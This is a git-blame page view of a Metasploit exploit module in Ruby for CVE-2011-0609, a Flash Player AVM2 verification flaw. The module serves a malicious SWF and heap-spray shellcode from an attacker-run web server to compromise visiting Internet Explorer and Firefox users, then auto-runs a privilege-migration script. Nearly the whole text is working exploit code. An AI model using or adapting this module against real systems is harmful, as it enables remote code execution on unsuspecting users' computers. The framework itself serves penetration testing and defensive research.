Files
metasploit-gs/modules/exploits/windows/browser/adobe_flashplayer_avm.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

121 lines
4.2 KiB
Ruby
Raw Normal View History

2011-03-23 04:31:48 +00:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2011-03-23 04:31:48 +00:00
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
2011-03-23 04:31:48 +00:00
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Flash Player AVM Bytecode Verification Vulnerability',
2011-03-23 04:31:48 +00:00
'Description' => %q{
This module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33
and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification
logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same
vulnerability that was used for the RSA attack in March 2011.
2011-03-23 04:31:48 +00:00
Specifically, this issue results in uninitialized memory being referenced and later
executed. Taking advantage of this issue relies on heap spraying and controlling the
uninitialized memory.
Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several
other browsers. DEP does catch the exploit and causes it to fail. Due to the nature
of the uninitialized memory its fairly difficult to get around this restriction.
2011-03-23 04:31:48 +00:00
},
'License' => MSF_LICENSE,
'Author' =>
[
'bannedit', # Metasploit version,
'Unknown' # Malcode version seen used in targeted attacks
2011-03-23 04:31:48 +00:00
],
'References' =>
[
['CVE', '2011-0609'],
['OSVDB', '71254'],
2011-03-23 04:31:48 +00:00
['URL', 'http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html'],
['URL', 'http://www.adobe.com/devnet/swf.html'],
['URL', 'http://www.adobe.com/support/security/advisories/apsa11-01.html'],
['URL', 'http://www.f-secure.com/weblog/archives/00002226.html'],
2011-03-23 04:31:48 +00:00
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'HTTP::compression' => 'gzip',
'HTTP::chunked' => true,
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
2011-03-23 04:31:48 +00:00
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {}],
2011-03-23 04:31:48 +00:00
],
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2011-03-15',
2011-03-23 04:31:48 +00:00
'DefaultTarget' => 0))
end
def exploit
2013-09-26 20:34:48 +01:00
path = File.join( Msf::Config.data_directory, "exploits", "CVE-2011-0609.swf" )
2011-03-23 04:31:48 +00:00
fd = File.open( path, "rb" )
@swf = fd.read(fd.stat.size)
2011-03-23 04:31:48 +00:00
fd.close
super
2011-03-23 04:31:48 +00:00
end
2011-03-23 04:31:48 +00:00
def on_request_uri(cli, request)
trigger = @swf
2011-03-23 04:31:48 +00:00
trigger_file = rand_text_alpha(rand(6)+3) + ".swf"
shellcode = payload.encoded.unpack('H*')[0]
obj_id = rand_text_alpha(rand(6)+3)
2011-03-23 04:31:48 +00:00
if request.uri.match(/\.swf/i)
print_status("Sending Exploit SWF")
2011-03-23 04:31:48 +00:00
send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
return
end
# we use a nice trick by having Flash request our shellcode and load it for the heap spray
# src for the flash file: external/source/exploits/CVE-2011-0609/exploit.as
if request.uri.match(/\.txt/i)
send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })
return
end
2011-03-23 04:31:48 +00:00
html = <<-EOS
<html>
<head>
</head>
<body>
<center>
2011-03-23 04:31:48 +00:00
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
id="#{obj_id}" width="600" height="400"
2011-03-23 04:31:48 +00:00
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
<param name="movie" value="#{get_resource}#{trigger_file}" />
<embed src="#{get_resource}#{trigger_file}" quality="high"
width="320" height="300" name="#{obj_id}" align="middle"
allowNetworking="all"
type="application/x-shockwave-flash"
pluginspage="http://www.macromedia.com/go/getflashplayer">
</embed>
2011-03-23 04:31:48 +00:00
</object>
</center>
</body>
</html>
EOS
2012-04-20 13:31:42 -06:00
print_status("Sending #{self.name} HTML")
2011-03-23 04:31:48 +00:00
send_response(cli, html, { 'Content-Type' => 'text/html' })
end
end